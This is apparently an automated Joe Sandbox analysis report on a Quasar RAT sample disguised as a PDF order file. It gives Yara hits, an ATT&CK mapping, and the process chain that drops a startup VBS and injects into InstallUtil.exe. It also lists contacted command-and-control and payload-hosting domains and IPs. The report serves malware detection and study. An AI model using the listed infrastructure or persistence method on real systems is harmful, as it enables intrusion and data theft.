                    Source: Yara matchFile source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3624, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3632, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts21
                    Windows Management Instrumentation                    		111
                    Scripting                    		11
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping211
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		41
                    Virtualization/Sandbox Evasion                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging113
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Hidden Files and Directories                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Obfuscated Files or Information                    		DCSync23
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Software Packing                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557393 Sample: Order8898327329372938729382... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 29 new-visit.com 2->29 31 www.oleonidas.gr 2->31 33 3 other IPs or domains 2->33 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 12 other signatures 2->53 8 Order88983273293729387293828PDF.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 process4 dnsIp5 35 oleonidas.gr 185.78.221.73, 443, 49730, 49734 IPHOSTGRIpDomainGR Greece 8->35 23 C:\Users\user\AppData\...\MaxGeneration.exe, PE32 8->23 dropped 25 C:\Users\user\AppData\...\MaxGeneration.vbs, ASCII 8->25 dropped 27 C:\...\MaxGeneration.exe:Zone.Identifier, ASCII 8->27 dropped 55 Drops VBS files to the startup folder 8->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->57 15 InstallUtil.exe 14 8 8->15         started        59 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->59 19 MaxGeneration.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 37 new-visit.com 72.11.156.80, 3791, 49731 ASN-QUADRANET-GLOBALUS United States 15->37 39 ipwho.is 195.201.57.90, 443, 49733 HETZNER-ASDE Germany 15->39 41 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->41 43 Multi AV Scanner detection for dropped file 19->43 45 Machine Learning detection for dropped file 19->45 21 InstallUtil.exe 3 19->21         started        signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Order88983273293729387293828PDF.exe32%ReversingLabsWin32.Trojan.Generic
                    Order88983273293729387293828PDF.exe36%VirustotalBrowse
                    Order88983273293729387293828PDF.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\MaxGeneration.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\MaxGeneration.exe32%ReversingLabsWin32.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    oleonidas.gr0%VirustotalBrowse
                    www.oleonidas.gr0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://entityframework-extensions.net/md5-exception0%Avira URL Cloudsafe
                    https://dapper-plus.net/getting-started-mapping#instance-context-mapping.0%Avira URL Cloudsafe
                    https://bulk-operations.net0%Avira URL Cloudsafe
                    https://dapper-plus.net/pricing.0%Avira URL Cloudsafe
                    https://entityframework-extensions.net/)0%Avira URL Cloudsafe
                    http://www.zzzprojects.com0%Avira URL Cloudsafe
                    https://bulk-operations.net/pricing.0%Avira URL Cloudsafe
                    https://www.oleonidas.gr0%Avira URL Cloudsafe
                    https://entityframework-extensions.net/pricing.0%Avira URL Cloudsafe
                    https://dapper-plus.net/getting-started-mapping#instance-context-mapping0%Avira URL Cloudsafe
                    https://entityframework-extensions.net/include-graph).0%Avira URL Cloudsafe
                    https://linqtosql-plus.net/pricing.0%Avira URL Cloudsafe
                    https://www.oleonidas.gr/slim/Wyaiccfynhd.mp30%Avira URL Cloudsafe
                    new-visit.com0%Avira URL Cloudsafe
                    https://entityframework-extensions.net/md5-exceptionX0%Avira URL Cloudsafe
                    http://entityframework-plus.net/0%Avira URL Cloudsafe
                    https://dapper-plus.net/getting-started-mapping#instance-context-mappingGMore0%Avira URL Cloudsafe
                    https://dapper-plus.net0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.214.172
                    		truefalse
                      		high
                      oleonidas.gr
                      		185.78.221.73
                      		truefalseunknown
                      ipwho.is
                      		195.201.57.90
                      		truefalse
                        		high
                        new-visit.com
                        		72.11.156.80
                        		truetrue
                          		unknown
                          www.oleonidas.gr
                          		unknown
                          		unknownfalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://www.oleonidas.gr/slim/Wyaiccfynhd.mp3false
                          • Avira URL Cloud: safe
                          		unknown
                          new-visit.comtrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://ipwho.is/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://entityframework-extensions.net/md5-exceptionOrder88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://bulk-operations.netOrder88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://stackoverflow.com/q/14436606/23354Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.000000000290C000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                https://dapper-plus.net/getting-started-mapping#instance-context-mapping.Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/mgravell/protobuf-netJOrder88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004EBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://dapper-plus.net/pricing.Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.datacontract.org/2004/07/InstallUtil.exe, 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://ipwho.isdInstallUtil.exe, 00000001.00000002.2919597107.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/mgravell/protobuf-netOrder88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://entityframework-extensions.net/)Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zzzprojects.comOrder88983273293729387293828PDF.exe, MaxGeneration.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://bulk-operations.net/pricing.Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.oleonidas.grOrder88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://entityframework-extensions.net/include-graph).Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://entityframework-extensions.net/pricing.Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://dapper-plus.net/getting-started-mapping#instance-context-mappingOrder88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215VSELECTOrder88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.datacontract.org/2004/07/dInstallUtil.exe, 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://linqtosql-plus.net/pricing.Order88983273293729387293828PDF.exe, MaxGeneration.exe.0.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://github.com/mgravell/protobuf-netiOrder88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://entityframework-extensions.net/md5-exceptionXOrder88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://stackoverflow.com/q/11564914/23354;Order88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://stackoverflow.com/q/2152978/23354Order88983273293729387293828PDF.exe, 00000000.00000002.1738793310.0000000006950000.00000004.08000000.00040000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000004139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ipwho.isInstallUtil.exe, 00000001.00000002.2919597107.0000000002ABC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://entityframework-plus.net/Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://stackoverflow.com/q/2152978/23354sCannotOrder88983273293729387293828PDF.exe, 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://ipwho.isInstallUtil.exe, 00000001.00000002.2919597107.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dapper-plus.netOrder88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://dapper-plus.net/getting-started-mapping#instance-context-mappingGMoreOrder88983273293729387293828PDF.exe, 00000000.00000002.1726584671.00000000037D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              72.11.156.80
                                                              		new-visit.comUnited States
                                                              		8100ASN-QUADRANET-GLOBALUStrue
                                                              185.78.221.73
                                                              		oleonidas.grGreece
                                                              		47521IPHOSTGRIpDomainGRfalse
                                                              195.201.57.90
                                                              		ipwho.isGermany
                                                              		24940HETZNER-ASDEfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1557393
                                                              Start date and time:2024-11-18 08:16:06 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 7m 34s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:9
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Order88983273293729387293828PDF.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.expl.evad.winEXE@8/6@3/3
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:
                                                              • Successful, ratio: 90%
                                                              • Number of executed functions: 360
                                                              • Number of non-executed functions: 15
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target MaxGeneration.exe, PID 1344 because it is empty
                                                              • Execution Graph export aborted for target Order88983273293729387293828PDF.exe, PID 180 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              02:16:58API Interceptor26x Sleep call for process: Order88983273293729387293828PDF.exe modified
                                                              02:17:07API Interceptor1x Sleep call for process: InstallUtil.exe modified
                                                              02:17:12API Interceptor23x Sleep call for process: MaxGeneration.exe modified
                                                              07:17:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              185.78.221.73e-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                                DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                  RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      195.201.57.90SPt4FUjZMt.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLineBrowse
                                                                      • /?output=json
                                                                      765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                                      • /?output=json
                                                                      765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                                      • /?output=json
                                                                      WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                                                      • /?output=json
                                                                      ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                                      • ipwhois.app/xml/
                                                                      cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                      • /?output=json
                                                                      Clipper.exeGet hashmaliciousUnknownBrowse
                                                                      • /?output=json
                                                                      cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                                                                      • /?output=json
                                                                      Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                                                      • /?output=json
                                                                      Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                                      • /?output=json

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ipwho.is1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                                      • 195.201.57.90
                                                                      https://2storageaccounterm67.z13.web.core.windows.net/Win08Ay0Er08d8d77/index.html#Get hashmaliciousTechSupportScamBrowse
                                                                      • 195.201.57.90
                                                                      https://tronblkma8sus7.z13.web.core.windows.net/?click_id=2isqs9oomm3gdtdt2&tid=903&subid=googlesapis.com&ref=googlesapis.com&922%5DGet hashmaliciousTechSupportScamBrowse
                                                                      • 195.201.57.90
                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                      • 15.204.213.5
                                                                      1.cmdGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      fqr76a(1).batGet hashmaliciousUnknownBrowse
                                                                      • 108.181.98.179
                                                                      yde4cz.cmdGet hashmaliciousUnknownBrowse
                                                                      • 195.201.57.90
                                                                      WMdKM7E5Yg.exeGet hashmaliciousQuasarBrowse
                                                                      • 147.135.36.89
                                                                      bg.microsoft.map.fastly.netSyncBackPro64_Setup.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      ADZP 20 Complex.exeGet hashmaliciousBabadeda, WiperBrowse
                                                                      • 199.232.214.172
                                                                      ADZP 20 Complex.batGet hashmaliciousWiperBrowse
                                                                      • 199.232.214.172
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.232.210.172
                                                                      LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                                      • 199.232.210.172
                                                                      0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • 199.232.210.172
                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                      • 199.232.210.172
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 199.232.214.172
                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                      • 199.232.214.172

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ASN-QUADRANET-GLOBALUS.main.elfGet hashmaliciousXmrigBrowse
